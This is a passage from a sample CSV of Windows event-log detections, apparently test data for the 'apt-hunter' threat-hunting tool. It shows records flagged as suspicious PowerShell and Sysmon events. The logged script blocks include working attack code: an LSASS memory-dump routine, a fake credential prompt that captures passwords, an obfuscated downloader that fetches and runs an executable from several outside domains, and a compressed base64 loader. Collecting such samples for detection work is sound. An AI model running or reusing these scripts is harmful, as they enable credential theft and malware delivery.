pex7hfbnt
/
apt-hunter
1
0
Fork 1
Code Issues Pull Requests Packages Projects Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '9842d0cac5'
${ noResults }
apt-hunter/source/samples/Sample_TimeSketch.csv

41691 lines
2.5 MiB
Raw Blame History Escape

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel
powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2020-06-30T14:24:08.254605Z"">
</TimeCreated>
<EventRecordID>971</EventRecordID>
<Correlation ActivityID=""4AA5EAE3-4F33-0001-3A2B-A64A334FD601"">
</Correlation>
<Execution ProcessID=""7008"" ThreadID=""6488"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">function Memory($path)
{
$Process = Get-Process lsass
$DumpFilePath = $path
$WER = [PSObject].Assembly.GetType(&apos;System.Management.Automation.WindowsErrorReporting&apos;)
$WERNativeMethods = $WER.GetNestedType(&apos;NativeMethods&apos;, &apos;NonPublic&apos;)
$Flags = [Reflection.BindingFlags] &apos;NonPublic, Static&apos;
$MiniDumpWriteDump = $WERNativeMethods.GetMethod(&apos;MiniDumpWriteDump&apos;, $Flags)
$MiniDumpWithFullMemory = [UInt32] 2
#
$ProcessId = $Process.Id
$ProcessName = $Process.Name
$ProcessHandle = $Process.Handle
$ProcessFileName = &quot;$($ProcessName).dmp&quot;
$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
$ProcessId,
$FileStream.SafeFileHandle,
$MiniDumpWithFullMemory,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero))
$FileStream.Close()
if (-not $Result)
{
$Exception = New-Object ComponentModel.Win32Exception
$ExceptionMessage = &quot;$($Exception.Message) ($($ProcessName):$($ProcessId))&quot;
# Remove any partially written dump files. For example, a partial dump will be written
# in the case when 32-bit PowerShell tries to dump a 64-bit process.
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
throw $ExceptionMessage
}
else
{
&quot;Memdump complete!&quot;
}
}</Data>
<Data Name=""ScriptBlockId"">27f08bda-c330-419f-b83b-eb5c0f699930</Data>
<Data Name=""Path"">C:\Users\Public\lsass_wer_ps.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2019-09-09T13:35:09.315230Z"">
</TimeCreated>
<EventRecordID>1123</EventRecordID>
<Correlation ActivityID=""B5ABE6C2-675C-0001-A601-ACB55C67D501"">
</Correlation>
<Execution ProcessID=""5500"" ThreadID=""356"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">function Invoke-LoginPrompt{
$cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Please enter user credentials&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
$username = &quot;$env:username&quot;
$domain = &quot;$env:userdomain&quot;
$full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
while($DS.ValidateCredentials(&quot;$full&quot;,&quot;$password&quot;) -ne $True){
$cred = $Host.ui.PromptForCredential(&quot;Windows Security&quot;, &quot;Invalid Credentials, Please try again&quot;, &quot;$env:userdomain\$env:username&quot;,&quot;&quot;)
$username = &quot;$env:username&quot;
$domain = &quot;$env:userdomain&quot;
$full = &quot;$domain&quot; + &quot;\&quot; + &quot;$username&quot;
$password = $cred.GetNetworkCredential().password
Add-Type -assemblyname System.DirectoryServices.AccountManagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$DS.ValidateCredentials(&quot;$full&quot;, &quot;$password&quot;) | out-null
}
$output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
$output
R{START_PROCESS}
}
Invoke-LoginPrompt</Data>
<Data Name=""ScriptBlockId"">c7ca7056-b317-4fff-b796-05d8ef896dcd</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:28.845521Z"">
</TimeCreated>
<EventRecordID>683</EventRecordID>
<Correlation ActivityID=""CCAD9034-7B61-0001-83CF-ADCC617BD601"">
</Correlation>
<Execution ProcessID=""6620"" ThreadID=""6340"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security UserID=""S-1-5-21-2895499743-3664716236-3399808827-1001"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;)</Data>
<Data Name=""ScriptBlockId"">fdd51159-9602-40cb-839d-c31039ebbc3a</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational
powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-PowerShell"" Guid=""A0C1853B-5C40-4B15-8766-3CF1C58F985A"">
</Provider>
<EventID>4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0</Keywords>
<TimeCreated SystemTime=""2019-09-09T13:35:08.655802Z"">
</TimeCreated>
<EventRecordID>1122</EventRecordID>
<Correlation ActivityID=""B5ABE6C2-675C-0000-AAFD-ABB55C67D501"">
</Correlation>
<Execution ProcessID=""5500"" ThreadID=""356"">
</Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-21-3461203602-4096304019-2269080069-1000"">
</Security>
</System>
<EventData>
<Data Name=""MessageNumber"">1</Data>
<Data Name=""MessageTotal"">1</Data>
<Data Name=""ScriptBlockText"">&amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(&apos;H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA&apos;))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</Data>
<Data Name=""ScriptBlockId"">37f6d110-cfdf-4118-8748-17638e258531</Data>
<Data Name=""Path""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T20:43:58.451314Z"">
</TimeCreated>
<EventRecordID>2164892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 20:43:58.450</Data>
<Data Name=""ProcessGuid"">00247C92-858E-5F7B-0000-0010E741202B</Data>
<Data Name=""ProcessId"">6636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\windows\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-858E-5F7B-0000-00105241202B</Data>
<Data Name=""ParentProcessId"">18404</Data>
<Data Name=""ParentImage"">C:\Windows\System32\Taskmgr.exe</Data>
<Data Name=""ParentCommandLine"">C:\windows\system32\taskmgr.exe</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-02T14:48:53.950750Z"">
</TimeCreated>
<EventRecordID>10272</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1960"" ThreadID=""132"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-02 14:48:51.664</Data>
<Data Name=""ProcessGuid"">365ABB72-0244-5CCB-0000-00109AE70B00</Data>
<Data Name=""ProcessId"">1508</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7.home</Data>
<Data Name=""SourcePort"">49178</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.36.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-02T16:24:28.640990Z"">
</TimeCreated>
<EventRecordID>339891</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3200"" ThreadID=""3032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-02 16:24:28.637</Data>
<Data Name=""ProcessGuid"">747F3D96-E8BC-5F26-0000-0010F7C41A00</Data>
<Data Name=""ProcessId"">588</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
<Data Name=""ParentProcessId"">8104</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-22T22:09:35.284225Z"">
</TimeCreated>
<EventRecordID>564605</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3352"" ThreadID=""4696"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-22 22:09:35.263</Data>
<Data Name=""ProcessGuid"">747F3D96-F41F-6081-0000-001078834A00</Data>
<Data Name=""ProcessId"">6644</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\LOCAL SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-6E1A-6082-0000-0020E5030000</Data>
<Data Name=""LogonId"">0x3e5</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">624</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-02T16:24:26.809904Z"">
</TimeCreated>
<EventRecordID>339890</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3200"" ThreadID=""3032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-02 16:24:26.803</Data>
<Data Name=""ProcessGuid"">747F3D96-E8BA-5F26-0000-001035BE1A00</Data>
<Data Name=""ProcessId"">8104</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E308-5F26-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E309-5F26-0000-0010137B0000</Data>
<Data Name=""ParentProcessId"">820</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
